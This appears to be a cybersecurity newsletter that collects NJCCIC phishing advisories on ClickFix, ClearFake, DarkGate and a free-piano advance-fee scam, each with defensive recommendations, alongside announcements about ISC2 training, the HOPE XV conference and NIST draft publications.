The NJCCIC’s email security solution observed two new phishing campaigns utilizing PowerShell scripts to drop multiple malicious payloads. One campaign, dubbed ClickFix, launched by a threat actor identified as TA571, which was also behind the recently observed DarkGate phishing campaign. ClickFix shares many similarities to a second campaign known as ClearFake, and analysts spotted a significant overlap of tactics, techniques, and procedures (TTPs) between the two campaigns.
ClearFake uses a technique called EtherHiding, which uses the blockchain of Binance’s Smart Chain contracts to host a malicious script. This script is injected into compromised websites and loads a second script once a user visits. The secondary script triggers a fake overlay warning to appear, claiming that a root certificate needs to be installed for the website to appear correctly, and includes instructions on how to copy and execute a PowerShell script as a purported solution. If the PowerShell script is executed, the following actions will take place:
Flushes the DNS cache. Clears clipboard content to remove traces of the malicious script. Runs a second PowerShell script that downloads Lumma Stealer. Lumma Stealer downloads three additional payloads. Amadey LoaderXMRig cryptocurrency miner Clipboard Hijacker
Like ClearFake, the ClickFix campaign begins with an overlay warning on a compromised website stating that a recent browser update was faulty and offers a PowerShell script as a fix. ClickFix was initially observed leading to an infection from a Vidar Stealer payload but has since changed its infection chain, leading to the same payloads as the ClearFake campaign. Researchers are still determining if the threat actors behind the two campaigns work together or if ClearFake replaced the code of the already compromised ClickFix iframes.
Recommendations
Avoid clicking links and opening attachments in unsolicited emails.Confirm requests from senders via contact information obtained from verified and official sources.Type official website URLs into browsers manually.Facilitate user awareness training to include these types of phishing-based techniques.Maintain robust and up-to-date endpoint detection tools on every endpoint.Consider leveraging behavior-based detection tools rather than signature-based tools.Phishing and other malicious cyber activity can be reported to the FBI’s IC3 and the NJCCIC.
The Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with US and international partners, released this Joint Report that urges organizations to move toward more robust security solutions, such as Secure Service Edge (SSE) and Secure Access Service Edge (SASE) that provide greater visibility of network activity. While this report does not cover the planning, architecture, or adaption needs for shifting to these solutions, it does call for organizations to shift away from traditional broad remote access deployments and provides best practices to help transition to modern solutions, such as SSE and SASE. Organizations are encouraged to carefully assess their security posture and perform a risk analysis before implementing any/all solutions to determine if these approaches fit their organization. Executive leadership, network defenders, and critical infrastructure organizations are provided with an overview and best practices of primarily cloud-based solutions that can support hybrid and on-premises implementation and incorporate a zero trust approach. Both information technology (IT) and operational technology (OT) network protections are provided in this report that covers a spectrum of network sensitivities and worst-case consequences of compromise. This report will help organizations better understand the vulnerabilities, threats, and practices associated with traditional remote access and VPN deployment, along with the inherent business risk posed to an organization’s network by remote access misconfiguration. Aligned with CISA’s cross-sector cybersecurity performance goals (CPGs), the best practices in this report will also help guide leaders with prioritizing the protection of their remote computing environment security while operating under the fundamental principles of least privilege.
Lure email purporting to be giving away a “free” piano. Image Source: Proofpoint
The NJCCIC recently received reports of a phishing campaign that was also identified by Proofpoint. The campaign involves malicious emails using piano or musical instrument-themed messages to lure people into advance fee fraud (AFF) scams. At least 125,000 messages associated with a piano scam campaigns have been identified since January, primarily targeting students and faculty at North American educational facilities. Proofpoint noted that some healthcare and food and beverage organizations were also targeted.
The phishing emails claim that a staff member is giving away a piano and other musical instruments for free due to downsizing or moving. When a target replies, the threat actor instructs them to arrange delivery by contacting a shipping company via a fraudulent email address managed by the threat actors. The “shipping company” then claims they will send the piano if the recipient sends the money for shipping first.
Proofpoint reported that a single Bitcoin wallet address linked to this campaign currently holds over $900,000, although it is unknown if all funds were accumulated from the “free piano” lure. Analysts assess that multiple threat actors are likely conducting different types of scams simultaneously using the same wallet address due to the volume of transactions, variation in transaction prices, and the overall amount of money associated with the account. Proofpoint analysis also revealed that one of the cybercriminals used a Nigerian IP address, suggesting that at least part of the operation is based in Nigeria.
DarkGate has spread through several phishing campaigns, including fake browser updates, the messaging feature in Microsoft Teams, and PDFs containing Google DoubleClick Digital Marketing (DDM) open redirects. The NJCCIC recently reported on a DarkGate campaign exploiting a Windows SmartScreen vulnerability.
The NJCCIC’s email security solution has recently observed multiple attempts to spread DarkGate malware through various phishing campaigns. These emails were flagged as they included newly registered domains and uncommon senders. While the content of the emails varied, they primarily referred to charges and payments due and included malicious HTML attachments. Once opened, a fake Microsoft Word document is loaded, displaying an error message that requests the installation of a root certificate and instructions for remediation. Upon initiating the purported fix, a PowerShell script triggers and installs DarkGate on the user’s device.
A second observed DarkGate campaign used similar phishing emails with malicious HTML attachments; however, once opened, the attachments claimed the user could not connect to Microsoft OneDrive. After clicking the “How to Fix” button, either PowerShell scripts automatically downloaded DarkGate or users were instructed on how to open PowerShell to initiate the “fix” themselves, which initiated the malware download.
Recommendations
Avoid clicking links and opening attachments in unsolicited emails.Confirm requests from senders via contact information obtained from verified and official sources.Type official website URLs into browsers manually.Facilitate user awareness training to include these types of phishing-based techniques.Maintain robust and up-to-date endpoint detection tools on every endpoint.Consider leveraging behavior-based detection tools rather than signature-based tools.Phishing and other malicious cyber activity can be reported to the FBI’s IC3 and the NJCCIC.
See yourself in cybersecurity. You don’t need experience — just the passion and drive to enter a demanding and rewarding field, one that opens limitless opportunities worldwide.
As part of our commitment to help close the cybersecurity workforce gap and diversify those working in the field, ISC2 is offering FREE Certified in Cybersecurity (CC) Online Self-Paced Training and exams to one million people.
Start Your Journey To participate in the One Million Certified in Cybersecurity program, please follow these simple steps:
Complete your ISC2 Candidate application form and select Certified in Cybersecurity as your certification of interest.
Once the application is complete, you’ll become an ISC2 Candidate. It’s free to join and you’ll gain access to Official ISC2 Certified in Cybersecurity Online Self-Paced Training and the opportunity to register for the free certification exam. You will find your access on the Candidate Benefits page.
Upon passing the exam, complete the application form and pay U.S. $50 Annual Maintenance Fee (AMF). Once completed you’ll become a certified member of ISC2 – the world’s largest association of certified cybersecurity professionals – with access to a broad range of professional development resources to help you throughout your career
Your self-guided tour toward certification — now featuring adaptive learning for a streamlined experience customized to each individual. Leveraging the power of AI, the training guides learners through a self-paced learning experience adapted to their individual needs. This class will have instructor Lead class it will Be 2 Saturday in a row Dates: July 20, 27 Time: 8-4 Location: Virtual Class is Offered by ISC2 NJ chapter. You do not need to be a member but of course you can join even if your not in New Jersey. I will be teaching the Class.
Exam included.
Pay U.S. $50 Annual Maintenance Fee (AMF) upon passing the certification exam.
HOPE XV will be the fifteenth Hackers On Planet Earth event. July 12-14, 2024 at St. John University Queens, NY
This event promises to be memorable. It is open to all hackers, makers, tinkerers, experimenters, artists, educators and anyone else with an interest in exploring and improving the world we live in and sharing knowledge with others.
Virtual tickets get you all the presentations via livestream, plus access to live chat with other attendees and presenters.
HOPE is an all-ages event with multiple simultaneous sessions and many other things to do throughout the weekend. All of this is in a relaxed and comfortable university environment, with friendly and supportive conference attendees.
I was presented with a Lifetime Achievement Award at SECON NJ at Kean University. From Ken Fisken president of ISC2 New Jersey Chapter. To say I was shocked is an understatement, I am very honored to be the recipient of this honor. As I say, if all of us would give back to community 1 hour, think how much better the world would be.
There is an incorrect and widespread assumption that hardware is inherently secure. However, this report documents numerous potential security failures that can occur in hardware. It also demonstrates the diverse ways in which hardware can be vulnerable.
The authors leveraged existing work on hardware weaknesses to provide a catalog of 98 security failure scenarios. Each of these is a succinct statement that describes how hardware can be exploited, where such an exploitation can occur, and what kind of damage is possible. This should raise awareness of the many types of hardware security issues that can occur.
The public comment period for this initial public draft is open through July 31, 2024. See the publication details for a copy of the draft and instructions for submitting comments.
Cloud-native applications, which are generally based on microservices-based application architecture, involve the governance of thousands of services with as many inter-service calls. In this environment, ensuring data security involves more than simply specifying and granting authorization during service requests. It also requires a comprehensive strategy to categorize and analyze data access and leakage as data travels across various protocols (e.g., gRPC, REST-based), especially within ephemeral and scalable microservices implemented as containers.
Hence, in addition to techniques for protecting data at rest (e.g., regular expressions), it has become essential to develop in-transit data categorization that performs real-time data analysis to actively monitor and secure data as it moves across services and network protocols. This IR outlines a practical framework for effective data protection using the capabilities of WebAssembly (WASM) — a platform-agnostic, in-proxy approach with compute and traffic processing capabilities (in-line, network traffic analysis at layers 4–7) that can be built and deployed to execute at native speed in a sandboxed and fault-tolerant manner.
The public comment period for this initial public draft is open through August 1, 2024. See the publication details for a copy of the draft and instructions for submitting comments.
NIST requests feedback on all aspects of these publications. Additionally, NIST would appreciate feedback on the guidance for CMAC and CCM authentication tag lengths. Currently, both publications recommend a minimum tag length of 64 bits.
Should these publications require that the authentication tags for CMAC and CCM meet a minimum threshold, such as 64 bits or more?
If not, what conditions/requirements on implementations should be specified for the use of shorter authentication tags for CMAC and CCM?
The public comment period is open through September 13, 2024. Comments may address the concerns raised in this announcement or other issues around security, implementation, clarity, risk, or relevance to current applications.
Send comments to cryptopubreviewboard@nist.gov with “Comments on SP 800-38B” or “Comments on SP 800-38C” in the subject.
Comments received in response to this request will be posted on the Crypto Publication Review Project site after the due date. Submitters’ names and affiliations (when provided) will be included, while contact information will be removed. See the project site for additional information about the review process.
